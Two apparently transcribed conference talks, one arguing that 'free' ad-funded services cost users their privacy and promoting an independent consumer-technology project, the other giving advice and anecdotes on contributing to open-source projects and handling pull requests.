what I call the experience machine. This is the end game of design as I see it. I'm a designer, right? The experience machine is a theoretical device. It is a device that knows everything about the world, that knows everything about you, and can read your mind. Now if we could build this today, we could all go home because our work here is done, right? Let's listen to Eric Schmidt. He says, we know where you are, we know where you've been, we can more or less know what you're thinking. So that's the ex-CEO and current Executive Chairman of Google. He said this four years ago. That's an eon in internet time. So you might say, we're all, so what? You know what? Yes, maybe they spy on me, but you know, they also care about my privacy. You know, it's kind of like the mafia. We'll protect you. Just stay with us, right? They care about our privacy. If I set something to private there, it will be private, right? Not really. Not anymore. Not after 9-11. After 9-11, what happened in the States was they set up this organization. The information-aware awareness office with the publicly stated goal of attaining total information awareness to know everything about everything and everyone, right? This was their real logo. I kid you not, this is their actual logo, right? Now if you're going to set up an organization with the goal of knowing everything about everyone, don't make this your logo. People get scared, you know, with a huge pyramid with an all-seeing eye shooting lasers at the world. Don't do that. So people got scared and they said, oh, no, no, no. We're not really going to do that. We'll shut it down. We were just playing with you, right? But as the Edward Snowden regulations last year showed, the NSA really needs to hire a PowerPoint designer. They do. But apart from that, they were sharing our data and they are sharing our data. All of the companies that we trusted with our data were sharing it with the U.S. government. Now there's one more thing about this slide. I don't know if you've noticed, but it doesn't happen every day, so I do feel I have to point it out. Microsoft was first at something. That doesn't happen every day. I think it deserves to be acknowledged. So what were they sharing? Everything. Everything that we thought was set to private was being shared. Why? Because it's so much easier for a person to go to a third party that you have voluntarily given your information to, to ask them for it, because it's not under the same protections under the law. To get that information directly from you, they would have to get a search warrant. They would have to get a warrant from a judge at least. And what does that do? It makes it expensive. Could they do that to everyone? No. Can they do this to everyone? Yes. That's what we call a dragnet surveillance. It's like fishing with a dragnet. You just want to get everyone's information and spy on everyone. That's what a lot of people have a problem with. It's like the security researcher and cryptographer Bruce Schneier said, the NSA didn't wake up and say, let's just spy on everyone. They looked up and they said, hey, the corporations are spying on everyone. Let's get in on the game. Let's get a piece of the action. Right? So if this is the case, I'm sure that the people who run companies like Google and Facebook really are worried and they care about our privacy, right? And they're going to do something about this. So again, let's see what Eric Schmidt thinks about this whole thing. He says, there's been surveillance for years. I'm not going to pass judgment on that. It's the nature of our society. So Eric, what should we do? If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place. Maybe you shouldn't be doing it in the first place. If you have something you don't want everyone to know or anyone to know, maybe you shouldn't be doing it in the first place. Why didn't we think about this? Problem solved, right? Well, I have to say, I've met Eric and he's a very stand-up guy. He didn't just say this. He believes it. You know, in his heart, he believes this. So to prove that he believes this, he created a couple of websites. He went on the internet and he created a few websites and he put his own personal images and his own personal videos of him and other people on these websites just to prove the point that if you have something you don't want anyone to know, you shouldn't be doing it in the first place. Some of my favorite ones that he created, there is erikstoyletantics.com. It's very interesting videos and not my taste, but there's also erikstfavoritesexytimes.com. It's very interesting photos and images and videos of Eric there. But my favorite by far is eriksmasturbationadventures.com. He goes on some great adventures. It's just amazing. You should really see it. Now these websites don't exist. And I know there are developers in the room, nor should they exist. Because privacy is not about whether or not you have something to hide. Privacy is having control over what you want to keep to yourself and what you want to share with others. Privacy is a fundamental human right for a reason. It is a fundamental human right that we have enshrined in the Universal Declaration of Human Rights in Article 12 to be precise. And the reason is because privacy is a prerequisite to civil liberties. It is a prerequisite to the rest of your human rights. It is the bedrock upon which we build our civil liberties and our fundamental freedoms. So with their business model of so-called free companies like Google, companies like Facebook are emerging as real threats to our privacy and therefore to our civil liberties and therefore to our human rights and therefore to our democracy. So free is a lie. It's a lie because it is a concealed barter. There is a barter going on. We are just not told about the value that we are contributing and about the value of what we are possibly losing in that relationship. So in that sense, it is really more a con, a confidence trick, the textbook definition of a confidence trick, of getting someone to trust you and then actually getting them to believe something that isn't true. It's a con. What do they do? They say, it's free. Come join our new platform. Let us grow together. It's free and it's lovely. What are they not telling you? That when their venture capitalist backers want ten times their money back, they're going to screw you by monetizing your data. That's the bit that's concealed. So it's a con. If you listen to Michael Novak from Facebook, he's a product manager, he recently said, now we are thinking about privacy as a set of experiences that help people feel comfortable. That's how they're thinking about privacy. Comfortable with what? Comfortable with the fact that you don't have privacy. In other words, it's a con. And it's more than a con. It's a monopoly. This business model is a monopoly on the internet today. So you might say, hey, I'm not going to use Google, I'll use Yahoo. What's their business model? Corporate surveillance, spying on you for money. I'm going to use LinkedIn. What's their business model? I'm going to use Snapchat. What's their business model? But they delete their photos and yeah, right, off of your device. So what happens when every alternative you have has the same business model? That's a scary place to be. And where every new startup thinks that this is where they want to be, right? The Silicon Valley dream is a nightmare. Take this. Who's seen spritz? How cool is spritz as a technology, right? For those of you that don't know, it is a way of reading. Now concentrate on that video and you're reading it something like 250 words per minute. It's a new way of reading. How often does that happen in the history of humanity, right? We've been reading like this for a very long time. This is awesome as a technology. And when I listened to their CEO present at a conference that I was at recently, he said, and you know what, it's great for people with dyslexia. Anyone have dyslexia over here? Anyone suffer from dyslexia? Yeah, anyone have it? No? No? Okay. If you do, it's great because apparently you can focus and that's part of the problem with dyslexia. You can focus and you can read better. So that's awesome, right? But what's their business model? They don't sell this. It's not an app that they sell. They have an SDK, a software development kit that they give to anyone to create tools, right? To put this technology in their own apps. The CEO was saying, I really want people to build great apps with this. You know, maybe email apps or other. Why? Because it all ties to their server and whatever you read with this, Spritz reads as well. What he told me at the speaker dinner was, you know, today we can know that you're on a page with the web. We want to know exactly what you've read, right? And what happens when someone takes this SDK and puts it into their email reader? They get to read your emails. And then what happens when they've read enough things? Google buys them. It's called an exit. In the Silicon Valley dream, there's only one way out. And that is the exit. You either exit to people via an IPO, or you exit to a larger corporate surveillance company that buys you. That is what venture capital and equity investment results in. So, of course, he presented dyslexia, right? But we're curing dyslexia. Think about it for a moment. What are they actually saying to someone with dyslexia? You can either read better and have us spy on what you're reading, or you can't read better. That's a bit shit. We deserve better. Humanity, I believe, deserves way better than this myopic vision of a single business model that we are worshiping at the altar of today. And it's not just them that try to accentuate the positives. Remember Project Tango, where they want to map your home, right? In their video, this is how they present it. Use it for visually impaired, give them auditory cues on where they're going. Oh, so Project Tango is just for giving visually impaired people auditory cues on where they're going. And we also happen to want to map everyone's home, because that's how we make money. Okay, so this monopoly that we have is leading us down a path that I call digital feudalism. Digital feudalism is a state of society where we don't even have the option of owning our own tools and data. Our only option is renting them from corporations. And that's not the best place to be, I don't think. So that's the problem. And if you want to learn more about the problem, there's a great documentary called Terms and Conditions May Apply. It's non-technical, so you can show it to your non-technical friends as well. And it is actually not a boring documentary on the subject of privacy and surveillance, so that's awesome. But that is the problem. If we leave it here, it's a very depressing place to leave it, right? You're like, thanks, Aral. Great, the world is fucked up. I feel better about myself right now. So let's not leave it there. What's the alternative? The alternative, of course, we all know this, right? Is open. The only problem is, open as a word has become so diluted, it is homeopathic right now, right? Open could mean anything, really, today. So I prefer free. Free as in liberty, free as in freedom, right? And free technologies, which we know as free software, are easy. We've solved all the problems I talked to you about, right? It's easy. So here's how we do it. You ready? Three steps, we're going to solve this problem. One, you clone the Git repository of a Google or Facebook alternative of some sort, right? We all know how to clone Git repositories, right? We're all technical folks, right? Number two, you install and you configure it on your own server, right? And you harden up that server and everything. We can all do that, right? I do this before breakfast, basically, every day, right? And number three, you just get all of your friends, your family, everyone you know just to follow these three steps and we have solved this problem. It's not easy. And that's the biggest problem we have in the free as in liberty world. Now some of you might be going, wait a minute, free's the answer, but free's the problem. Yes, the English language is fucked up. Unfortunately, the word free is overloaded with two meanings. One means gratis, no cost. One means libre as in liberty and freedom. I'm talking about freedom now. So the problem is that although something is open, I'm sorry, I meant free, it can still be closed to certain audiences. It's open to us as enthusiasts. It's closed to consumers. And that's a big problem. It's a problem of user experience. It's a problem of experience design. Let's take an example of this. Firefox OS. Who has or used Firefox OS phone? Wow, no one in the room. You will someday. Viva la révolution. Yeah. All right. So Firefox OS. So I was excited about this, right? So I got one of the first pre-release versions and then I got one of the release versions and I used both of them for a week, right? And this was hello for me. This was hello. It said set the date for me, please. And, you know, that's rude, right? That's not hello. What would happen if somebody came up to you and said, you know, what date is it? You know, I'm sorry, but unless they're like a muscly German guy from the future, that's really rude. And if they are, you're probably dead. So that's kind of rude. But I'm also going to go out on a limb here and say that nobody bought this phone in 1980, right? Why are you making me go through 30 years minimum just so I can start using you? This was a valid error message. Until I realized that on this platform, this was a valid error message, I reinstalled the operating system twice because I thought there is no way that this is a valid error message. This is the opening of the Maps app. If you can't read what it says, that's okay. Neither could I. This is the Maps app itself. There is a button on the lower left corner that I have never been able to hit. It became a casual game. You know, whenever I had some time on a train, I'd whip it out. I'd be like, can I hit the button? It was my own personal flappy bird. It's a game I regret to inform you that I have never successfully completed. This was me sending a direct message on Twitter to my girlfriend. If you can't see what I'm typing, that's okay. Neither could I. The keyboard is covering it. And in terms of impact, perhaps the worst example of all is this. This is the train times website in the UK which tells you about what times trains are available, whether they're delayed or not. Not working, not displaying properly, which meant that I went to London Bridge Station without knowing that every train was cancelled. Yeah, not everyone lives in Norway, guys. This shit happens. I don't know how. But without knowing that, which meant that I got home to my girlfriend, to my dog, two hours later than I should have. And this is the effect that the things that we make have on people. They either empower them, or they rob them of the thing that matters most, of their experiences, of their time. The two are very related because your lives are just a string of experiences. One experience after another, experiences with people, as we're having right now, and experiences with things. We make the things. We have a profound responsibility to not take the time, these experiences, of people for granted. Because we have a limited number, and once that hourglass of experiences, those grains of sand run out, that's it. We need to respect that. And that's not the only reason. That's not the only reason that I don't enjoy Firefox OS or Mozilla, to be honest. Who do you think gives Mozilla 90% of their money, 90% of their revenue? Where do you think it comes from? I hate to tell you, it comes from Google. So if you get 90% of your revenue from a company, do you think that creates any vested interests whatsoever? Maybe not. Maybe I'm just being a conspiracy theorist. But one thing I do know is that the revolution will not be sponsored by those that we are revolting against. That is not sponsorship. That is giving you a gilded sandbox, a gold-plated, gilded, beautiful sandbox to play in. Saying, you know, play with your stuff, just don't throw any sand outside and we'll be fine. Okay? Or else we'll shut down the sandbox. So Mozilla and Firefox OS are not the answer. They're not the answer partly because the whole world of free and open is still living in that bygone era of features. Where features were important. Because there was a time when they were important, right? If doubling the clock speed of your CPU is the difference between being able to send someone to the moon or not being able to send someone to the moon, who cares how hard that system is to learn and use? You're going to learn it and you're going to use it. Because the alternative is not doing what you want to do. That's not the case in the consumer space today. We have feature parity for most things. This will change. There will be a window of time when the investments that Google has made in quantum computing, in artificial intelligence, in robotics, look at the list of the last 15, 20 companies that they bought. When these start paying off, there will be a feature imbalance again. So we have, you know, we have a period of time where we can get our foot in if we can, or else it's going to be harder. But right now, there is feature parity. When there's feature parity, what differentiates is not features, it's experiences. But in the free world, we're still living under this theory of trickle-down technology. We may not call it that, it's my term for it, but it's like trickle-down economics. In trickle-down economics, it says if we take people who are hugely wealthy and we incentivize them to make more money, some of that extra money will also trickle down to other people who need it. This theory is big in the US, where 1% of the population owns 40% of the wealth. So they're still waiting for things to trickle down, right? The same in technology. In trickle-down technology, we believe that if enthusiasts create tools for other enthusiasts, it will somehow magically also become usable products for consumers. And this is why we've been giving people personal computers for 30 years, when apparently it seems all they really wanted were iPhones, right? But worse than that, we've been calling them stupid. We've been saying you're too dumb to use the things that we've made. When we've been too dumb to create simple enough solutions. It's a matter of experience. The companies that get experience today, Apple, I'll put Google in there when they make their own products. Forget the Android ecosystem, that's a clusterfuck. They're not like Nexus when they make their own products. What's similar between those two companies? They control every component that goes into the experience. The hardware, the software, the services, and soon connectivity. Because these are components. These are not products by themselves. It is the combination of these components that makes up the experience. And we're not living in the age of features anymore. Instead, we're living in the age of experiences. One of the companies that makes one of these remotes understands that. And you can see that they understand that the way it looks is a symptom of their organizational structure. It's a symptom of their culture, right? So open source and free software today are not fit for task for solving this problem. Because the problem demands consumer solutions. Not enthusiast solutions, not enterprise solutions, consumer solutions. So we need to create a new category of technology. A new category of free and open technology. That has experience-driven products. And in order to do that, in order to build these products, we can't just use the organizations that exist. Because we need to create new design-led, free and open organizations. Why? Because design is not something you can do by hiring a few great designers. It doesn't bubble up inside of the organization. It has to come from the top down, or it doesn't happen at all. And today, if we look at the market, yes, we have features-driven, closed products. Look at the products of Microsoft and Nokia and whatever, right? But we also have experience-driven, closed products. The products of Google and Facebook and Apple. But in the free world, we only have features-driven, open, features-driven, free and open. We cannot compete because we are missing a whole quadrant of technology. We are missing the quadrant of experience-driven, open technologies. And experience-driven, free and open technologies are very important because they are the prerequisite to empowering regular people to own their own tools and data. Unless we create these, we will not solve this problem. And if you look at the internet today, it is a wasteland of closed silos. And while this might be better than the centralized world that at one point we lived in, it is only decentralized. And decentralized doesn't mean what you think it means. It doesn't mean that there are no centers. It means that there are several centers. And these centers have become the Facebooks, the Googles and Twitters. It's not a bug. It is a feature of the way the web was designed. The client-server architecture. This is what it grew into. It is its nature. So we need to move beyond this. We need to move beyond this to a distributed system. A system where there are no centers. And this will be a slow process. It will be a weaning process that we go through. And what are those nodes? Well, those nodes might be personal clouds. Yes. But a personal cloud is not a product. It is a component of a greater consumer product. That consumer product might be a phone. That consumer product might be a tablet. It might be a computer. And of course it will have an operating system. But an operating system is not a product. It is a component of a product. We have to build these consumer holistic solutions. And that is what I call independent technology. This quadrant of technology. Or Inditech for short. Inditech are consumer products that empower people in the whole term. Not just the short term with great experiences. Because if we are empowering people in the short term and they do. Google Maps empowers me by telling me where to go in the short term. What is it doing long term to my privacy and my civil liberties? That is not enough. What do we do in the free world? We empower people in the long term. We say use our products. They will protect your privacy and your civil liberties. What about my experience right now? It is going to be pretty shit. But it is fine. It is arrogant. That is not respecting those grains of sand. Those experiences that are the only thing we have in life. We need to think in the whole term and design for the whole term. If you want to find out more the website for the movement for the initiative is inditech.org. And on July 4th we are going to have our first summit where we bring together people who care about this. For the first time and we see what happens. That is going to take place in Brighton in the United Kingdom. And I want you to know I am not just talking about this. You saw in my bio it says founder and lead designer of IndiePhone. What is IndiePhone? We are actually building one of the first examples of this. Who are we? Me and a small group of people who care about this really deeply. How is it funded? I am bootstrapping it. I sold a house, a family home that we have in Ankara. My parents are Turkish. I sold a family home and that is how we are financing it. Why? Because we have to be independent. Independent also from the interest from these gilded sandboxes. We cannot play in there if we are going to create true alternatives. We have been working on this for a while now. We are creating an operating system that is free and open called IndieOS. But that is not enough by itself. That is just a component. We are creating a cloud, a personal cloud called IndieCloud that is free and open. But that is not enough. We have a third thing. To tie these together this is not a consumer product and we cannot win this battle. We cannot even fight it. That is why we are actually building a phone. Hardware, software, services around it. And it is called IndiePhone. Now you might wonder, Aral, why? Why are you doing this? Why are you taking on some of the biggest names in the industry? I could be making a lot of money doing consulting or building my own products. I have done both of those things. Why did I just sell a house so I can do this? And the answer is really quite simple. I am doing this because I love technology and I love working in technology and I love the possibilities of what we can build with the skills that we have. I don't want to stop doing this anytime soon or in this lifetime. But I also do not want to work for these companies. I will not go and work at a Google or a Facebook no matter how much they pay me. Because I don't want to be complicit in this system that is robbing people of their privacy, their civil liberties and their fundamental freedoms. I want to live in a world where we have alternatives at least. We are not trying to kill Google or Facebook. But we are saying that unless we have alternatives, just the option of an alternative that doesn't spy on you but is a great experience. If we don't have this, a solution for consumers, we are going to be living in a very different world. The difference between living in a world where we have these alternatives and living in a world where we don't have these alternatives is the difference between living in a world where we have privacy and therefore civil liberties and fundamental freedoms and living in a world where we don't. A world where we constantly have to ask, please sir, may I? So yeah, free is a lie. The real cost of free is our privacy. The real cost of free is our civil liberties. The real cost of free is our human rights. And I think that that is too high a price to pay. Thank you. Thank you very much. Thank you. Thank you. I think I am almost spot on time, so I don't know if we have any time for questions, but I am sticking around for the rest of today. I will be at the party tonight. Please do come and talk to me. If you have questions, if you have concerns, if you want to offer your support, if you want to help out, you know, no matter what you do, I don't care if you work at Google or Facebook today. A job is a job. A life is something different. I do hope that we will have your support. I do hope that in whatever capacity we can strive for this together because we are all going to live in the world that we create. But thank you for having me. Thanks. Thank you.
|
It’s time for a design revolution in open technology. Companies like Google and Facebook that dominate the Internet promise us free services in exchange for the right to watch and study us; to mine and farm us. Like quarries, like livestock, we are natural resources to be exploited in a brave new digital world of corporate surveillance that threatens our most fundamental freedoms. There are open alternatives but they are too difficult for most of us to use. It is time to bring design thinking to open source and build beautiful, seamless open consumer products that are easy to use and which respect our fundamental freedoms.
|
10.5446/50789 (DOI)
|
Test, test, test, one, two, three, thank you. All right, while we're waiting for the last few stragglers to come in, we'll go through some of the formalities. For those of you who don't know me, my name is Brendan Forster. I come from all the way over in Australia. I do some open source stuff and I also work at GitHub. If other people would describe what I do, they would probably be wrong. Yeah, it's Microsoft guy, don't worry about it. But I do product work for GitHub around the window side and also technical stuff and also a bit of open source on the side. How I got involved with open source was actually, Google code was the first one I was using for open source. Now I came over to Codeplex and then Bitbucket and then GitHub. So in terms of all these source code hosting platforms, I've kind of gone through them all. But what was really interesting, there were two sort of projects that I was working on that gave me a lot of stories and so that's what we're going to cover off in this talk. This one is Code 52 in the summer, Australian summer of 2012, Andrew Tobin and Paul Jenkins. They wrote me into doing this thing and it sounded like a simple idea at the time. That is, let's build something every week, do an open source project, get people involved with it. But then we realized we had to do it next week and the week after that and the week after that. And while we got a lot of people involved with this stuff, we ended up being the core team and kind of still doing a lot of the logistics and cat herding. And so we got through about four months worth of projects before we just kind of went, yep, that's enough, we've got to stop. But it was an absolutely fantastic learning experience in terms of how open source projects get put together and how they encourage people to participate. The other one that I'm involved with is something that GitHub is running around OctoKit. So OctoKit is kind of our code name for our API libraries. So there's an Objective C and the Ruby libraries and I look after one of the.NET libraries. And so this is nice because I get to do something similar. I get to encourage people to participate in this project and when they quite often tell us it's their first pull request, I go, yes, excellent, we're getting more people involved. And there's various things like we get to play around with them and have gifts and just, yeah, encourage the community to get more involved. And the cool thing about OctoKit.NET is that we're up to 42 contributors already that have submitted pull requests that we've merged in. And there's a few people down here that are contributors. Thanks for coming and filling out the seats. And OctoKit was also in the community recently around strong naming. 170 comments about strong naming. That was amazing. Eventually, we actually decided we were going to use strong naming despite lots of people in the community saying, no, you shouldn't do it. Yeah, that was pretty hilarious. All right, a couple of disclaims about this talk. These are my opinions. Obviously, there's lots of people in the OBSource community that have differing opinions and that's perfectly fine. Oops. Let me get the differing. Oh, here we go. So yeah, lots of opinions. Don't take my words as gospel truth, but ultimately, I've got some stories to tell and we're going to have some fun. And the other one is to be aware of people who are prophesizing the one true open source faith, how Linus Torvalds' baby and they work in a certain way. The projects I work in work in a very different way. Like there are lots of ways out there to do open source. And lots of people tell me that they don't ever have time for doing open source. Like, you know, they've got families, they've got kids, you know, all that stuff. But the first tip that I'll give you is to read other people's code. There's all these places like my employer which have code out there over in various projects. Go read them. Yeah, I'm biased on GitHub. But one of the cool things that GitHub did recently was this thing called a showcase. And so we put out various open source projects around various categories. So if you're passionate about, for example, game programming, there's various categories around that where you can go and explore projects. Easy ways to kind of find interesting projects to go and read. Some projects that I'm reading at the moment, Reactive Cocoa, that's a port of Reactive Extensions over to the Cocoa library. We have Mac team at GitHub that use that stuff. Actually, they built it out and they use that for their apps. FAKE, I hope, 4K is around this week because I love to catch up with him. That's an F-sharp library for doing build scripts rather than using command files or PowerShell or all that. In K-Runtime, David Fowler's little baby around doing a lighter version of the CLR. I'm reading these things at the moment, kind of wrapping my hair around all that stuff. I highly recommend that you guys do the same. So you guys are reading code, but you're not sure how to contribute. You don't need to be on the core team to deliver a lot of value to projects. I'm going to show you some stuff that you can help out with. All right, let me tell you a little secret. I have a terrible reputation on Stack Overflow. I, yeah, that doesn't mean you shouldn't go there. I know lots of people who are, you know, gurus like Mr. Skeet. But that's where the action is in terms of people asking questions. You can see on there that I have some tags that I follow and I look at. But ultimately, that's where the action is in terms of supporting projects. So if you use something and you know enough about it, drop in the Stack Overflow and answer people's questions. Issue trackers. If you're more familiar with the project and how it works, you could cruise their issue tracker. And obviously, once you get to a certain point, you need to reach the core team to deal with something. This is the Chromium issue tracker. I found myself in there a couple of weeks ago looking at an issue with, yeah, opening links. But couldn't actually find something, so end up circumventing it and go straight to a contributor. Mailing lists. I don't like mailing lists at all. Who still uses mailing lists for browsing work? Anyone? One, two, three. Cool. So other than that, I like discussion forums. This is the Ember forums for basically just like open-ended discussions. I don't like issue, I don't like mailing lists because they all use email and I don't like email either. But in particular, there's a sort of pattern that comes up with mailing lists and you'll have people who just have a lot of time to just answer things on email discussions, answer threads in the email. Answer threads in the mailing list and you'll see that the time that you invest in the mailing list becomes sort of just a time sink, essentially. So you have people who are super passionate about things and you have people who just don't care and ultimately they all trend towards those people who care and the people who are sort of moderates, they just kind of step back. Whereas I like discussion forums because they're a lot easier to kind of dive into and they're a lot less intimidating for new people. Donations. We all remember OpenSSL and that lovely little vulnerability around being able to scrape memory off a machine. That was a project that had two core contributors and ultimately everyone on the internet was using it but no one was donating to it. I hope we've learned something from that because just recently, a few hours ago, they published a new security advisory. It's a bit more nuanced than the one that was there a couple months ago but ultimately these things are still happening and we need to kind of improve these projects that are core to internet infrastructure and make sure that things are secure. If you're not technical, if you've got like a graphics sort of background, design is one of the ways that you can contribute to projects and even if it's something as simple as an icon. James, hello, I can see you're up there as number two on the list. An icon for a project actually is rather useful. Oh, and there's Damien's as well on the next line. Documentation. Developers hate writing documentation. I don't like writing documentation. If you use something and you can contribute some words to it, we'll be all the better. Let's say you're a bit more hardcore than that. Steve Kladnik a couple of weeks ago put up this blog post around being an open source gardener. He was talking about how he was working on the Rails project and he spent a whole weekend reading up on these issues. So the scenario is that he was looking at contributing to Rails. He wasn't familiar with it at all. So he started with the issue tracker inside that issue tracker. He read through every issue over the course of a weekend. Didn't comment on any, but just got familiar with what the project was doing and then took a step back and then he worked through issue by issue, stuff that he could close out, stuff that he could comment on and stuff that he could actually point people to other resources. So over the course of a couple of months, I think it was after all this, he got to the point where he was doing curation on an open source project. Again, you guys probably do open source projects and so you know about this sort of mojo, but there's definitely an easy way for things to atrophy and fall away and die. I've got projects which have done that as well and it sucks, but you definitely need work to maintain the stuff. But we're all human in the end and even me, I do need some sleep. Other ways that other people can contribute to stuff, just share the load. So you're probably thinking, that sounds all straightforward. I'm just going to dive in right now and so you go open up your favorite text editor and you have a mental blank. I don't know what I want to build. I know I want to do something. You kind of just get stuck in this loop and then you flip the table and say, I don't know, I'm stuck. I don't know what stuff to work on. My next tip would be to scratch your own itch. Find something that problem that you've got to face and then try and solve that problem. Don't think of solving all the world's problems. It will be one of the greatest frameworks ever. Start with something small. I'll tell you about something small that I've worked on a couple of years ago. It was around testing asynchronous code. There were a couple of projects I was working on as part of the Code 52 stuff with various people. We go through this process of arguing about stuff, coming to an agreement and then basically hugging it out and then we go on to the next project and we repeat the whole process again. I think it was about the number three scenario that came up where I just kind of went and stuff and said, no, no, no, no, we've got to pull the stuff out to a library to make the stuff simple. So, AssertiX was born. A friend from Microsoft had some AssertiX sentions already bought in. I kind of proposed to add the stuff around testing task parallel library projects at the same time. I actually pulled it into an internal project a couple of months ago because I was hitting that same problem again and everything was hunky-dory. If you have useful code that you know is lying around, think about contributing it up, publishing it up, writing up some details around how to use it and see if you can make the world a better place. But I will warn you, if you do the stuff at work time, check your contracts because there might be stipulations around code that you've done at work or out of work and whether you can actually publish it because generally some companies will say the IP that you make at work is owned by them. But you might be not quite so keen on publishing up your code. You might believe it's terrible code. Yes, we've all written terrible code. It's just the natural part of life. There's something about open source developers that kind of, they grow a thick skin, I think, and they kind of get to this point where they say, yes, I can put the stuff out there. Critics be damned. This is a screenshot from a blog post that Scott Bellware wrote around adoption of technology. We have the people who are ahead of the curve and the early adopters and then there's this gap that teams or companies need to jump to pick up a new technology. I think this is probably the good model of open source participation because there's a number that someone quoted me, 20 million developers out there. At GitHub, there are six million users. So there is obviously this big curve that's behind the scenes of people who aren't on open source, might not be aware of open source, might not be participating in open source. It's not in the majority yet. The other thing about open source is that it is intimidating. Putting yourself out there for all the critics to see, some people aren't a fan of that. A couple of patterns that I've seen around users, not users, contributors in open source space is the imposter syndrome. The feeling that you can't do something because you feel like you'll be caught out as a fraud as soon as you do it. I felt this when I started at GitHub because I was actually a little anecdote. We're at a party and there was a band up there. Someone told me that they were actually GitHub employees. These awesome people I know are actually also awesome musicians. I can't play a guitar to save myself. They are up there playing like a real band. Of course, there are some benefits to contributing to open source projects and throwing yourself out there. This is a commit where I was fighting with JGit. I decided to drop in on it and say, best commit message ever. Little things like that make the whole experience better. Ultimately, you do have to throw yourself out there and it is intimidating. There's nothing else that I can really suggest aside from summing up some courage and jumping in. The other bias that I wanted to call out was self-selection bias. I'm someone who is male, late 20s, white, speaks English. That's kind of like the stereotypical developer that's out there. Imagine if you're not in that mold. Imagine that you're female, middle age, doesn't speak English as a primary language. Fitting into that culture is a lot more harder to do. You have to sum up courage. There are things that give me hope about this. The fact that there are some things that have come up recently around changing attitudes in industry and in open source projects. The one that I'll bring up was around LibuV. Back in November last year, there was a contribution to some docs to clean up the places where they used a sort of a gendered pronoun. This was actually quickly rejected and the internet noticed. The internet decided to pile on 225 comments later. I believe it's still going. The fact is that they had a lot of back and forth and internal infighting around whether this thing should be accepted. Ultimately, it was just some words. Why not just change it and move on? Not so long ago, Django had something similar come up. I'm not going to comment on, I actually don't care about the terminology that's there, but I don't know if people cared about it, that there were 700 and something comments for the space of five weeks. But they ended up taking it. They changed it and they, you don't agree? Yeah. They took it, they changed it, they, again, this is about documentation. Not actually changing code here, they're changing docs. And then after that, something interesting came up. Other requests came in, sort of changed things in certain ways. There was even one there that, we'll come to that one in a second. Someone saw this as an opportunity to kind of push things more forward and improve more documentation around things to make it more inclusive. There were also some hilarious ones in there. Changed the project name, bring in Batman and Robin to describe things. But this is again, this is all about documentation. And I just saw this as a big exercise in bike shedding, because all this effort was being spent on things that weren't moving the project forward. Yes, it was about being more inclusive, but again, lots of effort was spent and not really improving things. So we have those extreme cases of the internet piling on. Let's say you actually want to have a go at participating in a project. My advice is to kind of just look essentially. Lots of things, they're all done in the public because, you know, public and open source go hand in hand. Like time out to watch for things like personalities in a project, how these teams communicate, do they have sort of any in jokes, they probably do. Other things to look for is, do they have rules around how to challenge, how to turn the rules? Yeah, sorry, that probably should have been like learn the ropes. Like contributors, how do you get started? How do you submit a patch? How do you work through things? And of course, where is this project going? Maybe it's done. Maybe people just quibbling over stuff. If there's things on the roadmap that you might be able to contribute to, then it becomes a lot easier. But, you know, quite often there are big personalities in the open source space and if you don't feel like you can fit in, that's fine. No, maybe try something else out, maybe start off something else yourself. Yeah, this is going to be fun. So everyone who works in sort of open source, they will have stories like this where things have been bounced back. I'm just using an example here from OctoKid. There's a task that comes up, you want to take it and work on it, you then submit some code and you wait. You wait, you wait, you wait, you wait and then some clown rocks up and just closes it. That is not collaboration. That is just throwing things over the wall and maybe something gets thrown back in your face. So I'm going to tell you about my first pull request. If you've never heard of this site, it's just called firstpr.me from a colleague, Andrew Nesbitt and I forget the other chap's name, sorry. My first pull request was to SignalR. I was experimenting with the internals and what I wanted to do was add in artifact support. I went back and forth with David and in the end he closed off the pull request. I completely forgot about this until I found that site. Yeah, we moved it off to somewhere else but yeah, my first PR on SignalR was rejected. I guess the more you do open source, the more you kind of get this feeling of you're not your code. I don't be so attached to the stuff you're working on when someone says, you know, I don't like it, it's wrong sort of stuff. But hopefully maintainers will kind of work through things to improve it and get it to a point where then it can be merged in or you kind of get a good reason why it's not merged in. Again, doing things like that, that's not cool but it does happen out there. I'm going to pick on some friends of mine. First one is Rob Connery. You probably know him from previous, NDC Oslo's. He runs a project called Biggie which is a sort of a database, a flat file database for doing.NET development and he had someone submit a pull request. This was around specifically adding in tests for JSON, generated data, you know, all seemed hunky-dory but the more I read into the actual pull request itself, the more I kind of was a bit concerned. You know, the tests were hosted on Dropbox. They had various sort of prioritizations for tests. There were things that there were just kind of weird. So Rob wrote up this epic reply, I'll give you some summary of it but he said a lot of things in this reply. He was reminded of some tests being removed. He suggested things around how to basically restructure the tests. He wanted the tests to be done locally. But then he included some stuff that was kind of not really related to the pull request. He was just saying, you know, could you open this stuff up earlier? Not really relevant to the situation because it's already there. He also said, you know, would you be, if you can kind of take on this feedback and update it, we can do this in a different pull request. He was expecting the guy to reply but then he closed the pull request. So there was some sort of mixed messages in there and a lot of sort of details, you know, around what's going on. How could, you know, let's say our friend Rob have done things better? So for maintainers of projects, the things that you're working on, don't keep them in your head. Actually write them down somewhere so that actually other people can see what's going on. Discussions are easy to derail because it's the Internet. If you can keep things focused, that helps everyone kind of stay sane. And excuse me, don't write novels in email threads. It's so easy to do. But try and keep things as succinct as possible. Again, that's, I'm going to get on to that in the next point. And for contributors in particular, you know, be clear with what you're working on. If you've got an issue to work on, drop a comment and say, yeah, I want to dive into this, you know, how do I get started? Poor requests. This is something in particular we've noticed with doing stuff at GitHub is the sooner you can open up a call, sooner you can open up a poor request, the sooner you can get feedback. So even if it's partially done, you know, open it up and let people see what's going on with your code. If you've got a big task that you're working on, break it down with some steps to say, I'm working on this area here, this area here, this, this, this, this, this, so that anyone can see how close you are to being feature complete. And checklists is something that we use a lot in GitHub for tracking progress. Again, like a list, just kind of work through these tasks so that other people can see. Here's a good example of something I was working on recently. Basically I had a number of tasks to do, set up a checklist, you know, work through it and it was ready to go. I think I got merged in. Anyway, just kind of give people visibility on what you're working on and the maintainer side, you know, give them other people a plan to work on so they can contribute. The other guy I'm going to pick on is a colleague of mine, Paul Betts. He works in a project called Reactive UI and it got a pull request around coding style. Paul gets this a lot because he has a certain style and the guy was talking about, well, he was aware that the issue is a very religious argument around.NET developers and he said, if you can close this, well, you are welcome to close this immediately and then he goes off to talk about interfaces in the.NET framework which Reactive UI wasn't following and Paul left this comment as part of the close. He basically grabbed off a bunch of gifts, dropped them in there and then closed it. That's Paul's style. If the other guy might not have enjoyed it, but hopefully Paul gave him some entertainment as well as closing it which leads into my next point. Words are hard. So when you're in an open source sort of scenario, most of the stuff is done over text. It's easy to lose context with text and it's easy to assume things and it's easy to derail discussions. 